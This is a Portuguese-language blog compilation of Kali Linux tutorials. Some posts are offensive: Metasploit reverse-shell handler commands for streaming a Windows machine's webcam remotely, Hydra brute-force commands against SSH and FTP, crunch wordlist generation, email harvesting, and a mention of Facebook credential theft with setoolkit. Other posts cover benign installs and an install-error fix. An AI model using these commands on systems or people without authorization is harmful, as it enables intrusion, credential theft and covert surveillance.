Hackeando as Credenciais do facebook “setoolkit” kali linux

0

Boas Users!

Irei repassar uma forma de pegar, as credenciais do facebook com uma ferramenta chamda “setoolkit”.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Bem pessoal, essa foi uma pequena demonstração de como estamos vulneráveis, com
Participação do nosso amigo Thiago!!!!

By user777

 

 

Invadindo Webcam conectada no windows com “Kali Linux”

3

Boas Users!

Reforçando>> “Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Hoje Iremos abordar como acessar, Webcam conectada a um S.O windows com o kali linux, lembrando que o video ja mostra logado no “msfconsole”, quem não sabe como fazer os passos anteriores, por favor acessem esse link que mostro como fazer.

 

Comandos usados no acesso;

use exploit/multi/handler

use exploit/multi/handler= Carregando módulo a ser usado

set payload windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp= método utilizado

set lhost

set lhost= inserir o ip do kali

set lport

set lport= inserir a porta a ser utilizada

exploit

exploit = execução do backdoor

webcam_list

webcam_list= mostra se tem alguma webcam conectada

webcam_list

webcam_stream= abre a webcam remota, localmente

 

By user777

 

Instalando Teamviewer no Kali Linux

0

Boas Users!

Hoje vou ensinar como instalar o famoso Teamviewer no kali linux, vamos la!

#dpkg --add-architecture i386

1

#apt-get update

 

#wget -c https://download.teamviewer.com/download/teamviewer_i386.deb

 

 

#dpkg -i teamviewer_11.0.57095_i386.deb

2

#apt-get -f install

1

Pronto pessoal, assim finalizamos a instalação!

 

By user777

Hydra – Brute Force – Realizando pequeno ataque de força bruta.

1

Bom , neste pequeno Artigo vamos entender de forma básica o funcionamento do Hydra.
Para isso, me conectei ao meu kali linux de forma remota na porta ssh e procedi com todos os passos usados para se fazer um ataque de brute force, lembrando que o fato de estar conectado via ssh não me impede de usar os programas que rodam em modo terminal, impediria de usar os pacotes que necessitem de uma interface gráfica para tal.
Bom, é importante ressaltar que estou usando um ambiente de testes, o “host alvo” é de minha propriedade e este post serve apenas paras fins de analise e estudo, não fazendo apologia a invasão. Também não me responsabilizarei por eventuais danos causados a terceiros pelo uso incorreto dessa ferramenta..

 

Aqui temos a versão do Kali que estou rodando.

Bom, o Hydra como muitos conhecem é um programa open source disponibilizado nativamente no Kali Linux, tendo também o codigo fonte disponível para download no repositório oficial do projeto. E quanto a instalação do pacote, esta não será abordada nestas minhas pequenas linhas de raciocinio.

Quem quiser saber mais sobre o Hydra pode diretamente no terminal rodar o man do programa, bastando para isso…

root@love:~# man hydra

Ele dará todas as informações necessárias para que você o conheça melhor, podendo assim planejar e executar diferentes ataques.

Neste exemplo usei como alvo uma Routerboard 433AH rodando Router OS e com usuário previamente cadastrado. Falando em hydra, é sempre interessante ter, pelo menos, o nome de usuário que será usado durante o ataque.
A senha cadastrada foi incluída no nosso arquivo de senhas, qual será usado pelo hydra para realizar os testes de login e assim verificar o password correto.

Bom, vamos ao que realmente interessa. De posse do seu Terminal, crie um arquivo onde você possa inserir prováveis senhas(veja, estamos trabalhando com prováveis senhas , aquelas que imaginamos ser usadas pelo usuario vitima do ataque.) para que possamos realizar nosso pequeno e singelo ataque.
No Terminal, crie então um arquivo, o nome pode ser qualquer um.

root@love:~# nano pass.txt

Neste arquivo insira as senhas, caso use uma lista pre definida.

 

Após termos nossa base de dados de password já pronta, vamos então verificar quais serviços o nosso host vitima está rodando, quais portas estão abertas e que possam ser testadas pelo Hydra.

root@love:~# nmap -v 10.2.2.1

Constatada as portas abertas, podemos prosseguir com nosso propósito, atacar e obter o password.
Então, vamos invocar o Hydra de forma a usar o arquivo “pass.txt” como base para as senhas.

root@love:~# hydra -l kali -P pass.txt 10.2.2.1 ssh


Explicando a linha:
Hydra: invocamos o programa a ser executado, no caso obviamente o Hydra.
O menos L minusculo “-l” especifica login(vide man hydra).
Kali= Nome do usuário a ser testado (como disse acima, user previamente cadastrador por mim)
O “-P” maiúsculo especifica um arquivo contendo senhas, caso fosse “-p” minúsculo poderíamos especificar somente um password por vez.
Pass.txt é obviamente nosso arquivo com as passwords.
10.2.2.1 é o host alvo do ataque e o SSH no final da linha indica o serviço(porta) a ser testada.

Feito isso, basta correr o comando, damos {Enter} e aguardamos que os testes se concluam. Dependendo do tamanho do seu arquivo de senhas e da complexidade isso pode demorar muito tempo… 😉

Olha, que lindo, aqui já podemos ver que o Hydra encontrou o password do usuário Kali. Isso após alguns segundos somente.

Vamos fazer um teste via ssh?

Pronto, conectado…!
Realmente funciona, e realmente da para fazer ataques de níveis bem diferentes deste, por exemplo, caso eu quisesse testar também uma serie de senhas para o protocolo(serviço ftp) bastava a mim mudar ou especificar no fim da linha onde invoco o Hydra o serviço, para um ftp teríamos:

 

root@love:~# hydra -l kali -P passftp.txt 10.2.2.1 ftp

Bom amigos, por hoje e só por hoje é só! Hehe
O hydra é um velho companheiro, e se vocẽ quiser realmente aprender sobre ele não se esqueça de ler a man do programa, não existe tutorial/artigo que se compare a qualidade das informações disponíveis lá.

Gerando wordlist com crunch (kali linux)

0

Boas Users!

Aproveitando o belíssimo post do nosso amigo Thiago, sobre ataque de força bruta com o Hydra, vou mostrar como gerar sua própria wordlist.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Parâmetros do crunch:

$ sudo crunch 4 6 1234567890 -o /diretório/arquivo.lst

sudo= Permissão de super usuário

crunch= Gerador de wordlist

4= Mínimo de caracteres

6= Máximo de caracteres

1234567890= Números a serem gerados em ordens aleatória

-o= Faz com que em vez de serem apresentado no monitor os resultados dos nossos comandos, estes são escritos num ficheiro adicionados pelo parâmetro.

/diretório= Local onde será salvo o arquivo

$ sudo crunch 9 9 1234567890 -t maria@@@@ -o /diretório/arquivo.lst

-t= Inseri uma patente e modifica como entendermos. Sabemos que uma password é composta de um nome, neste caso maria mas de seguida é inserido 4 dígitos que não sabemos.

$ sudo crunch 9 9 1234567890 -t @@@@maria -o /diretório/arquivo.lst

Podemos inverter também, a sintaxe “maria@@@@”

$ sudo crunch 4 8 -f /usr/share/crunch/charset.lst mixalpha -o /diretório/arquivo.txt

Veja que nesse parâmetro do crunch, apliquei uma geração com o “charset”, uma wordlist ja pré-determinada, como “mixalpha” (letras maiúsculas e minúsculas).

Aqui foram alguns dos comandos e parâmetros do crunch, saiba mais aqui.

 

By user777

Coletando Endereços de Email’s com Kali Linux

0

Boas Users!

Vou mostrar como coletar, endereços de email’s de um determinado domínio.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Comandos usado:

# msfconsole

msfconsole= Framework criado por H.D.Moore, que serve para elaboração e execução de um repositório de exploits.

 

 

[ x ]
 

msf > use auxiliar/gather/search_email_collector

use auxiliar= Carregando o modulo email_collector

msf > set DOMAIN "domínio.com.br"

set DOMAIN= Selecionando o domínio

msn > run

run= Iniciando a coleta

 

 

Instalando “IRSSI” no kali linux cliente IRC

0

Boas Users!

Vamos instalar um cliente IRC, comunicação via terminal no kali linux.

1- abra o terminal e execute;

#apt-get install irssi

2- execute o irrsi no terminal;

#irssi

Captura de tela de 2016-07-21 01-06-40

3- Em seguida execute o comando abaixo para conectar a um servidor do irc;

/server freenode.net

OBS: usei o servidor da freenode como exemplo, você pode se conectar a qualquer servidor do IRC.

Captura de tela de 2016-07-21 01-14-52

4-Agora entraremos em uma sala ou também podemos criar uma sala se caso ela nao esteja criada, com o seguinte comando;

/join prefirolinux

Captura de tela de 2016-07-21 01-15-13

Pronto, nesse momento você certamente estará conectado a uma sala do IRC, para saber mais sobre os comandos acesse esse link e boa diversão.

 

 

By user777

 

 

 

 

 

 

 

Solução para o erro “Nenhuma unidade de CD-ROM comum foi detectada” Kali linux

0

Boas Users!

 

Diante do erro “Nenhuma unidade de CD-ROM comum foi detectada” a resolução é:

erro kali

 

1– esse erro ocorre geralmente, com pendrive.

2– ao aparecer essa tela de erro, retire o pendrive e coloque novamente e pressione enter.

3– se o erro permanecer, retire o pendrive novamente, sem desligar ou reiniciar o computador.

4– se estiver no windows, use o Daemon Tools para emular a ISO (se for windows 10 ele ja emula dando um duplo clique na ISO), formate o pendrive clicando com botão direito, e depois copie os arquivos de dentro da ISO para o pendrive, ao terminar, plugue novamente no computador que está sendo instalado o kali, e pressione enter novamente.

5–  se estiver no linux, Primeiro acesse o terminal como root:

su

Agora vamos acessar o /media:

# cd /media

E então crie um diretório onde deverá ser armazenado a nossa ISO:

# mkdir /diretorio_ISO

Agora é fácil montar a imagem .ISO, basta usar o comando abaixo. O comando “mount” que irá montar o nome da sua imagem ISO sem as aspas, o local onde está seu diretório para armazenar a ISO, o parâmetro “-o” como opção de montar tudo no fstab e o loop que executa o mount até o fim da ISO:

# mount “sua_Imagem.iso” /media/diretorio_ISO -o loop

 

 

By user777

Trace Mobile Kali Linux

0

Boas users!

 

Hoje estarei Disponibilizando um script em perl, para rastrear um IP mobile.

 

Link for perl – http://goo.gl/4ptqDk

By user777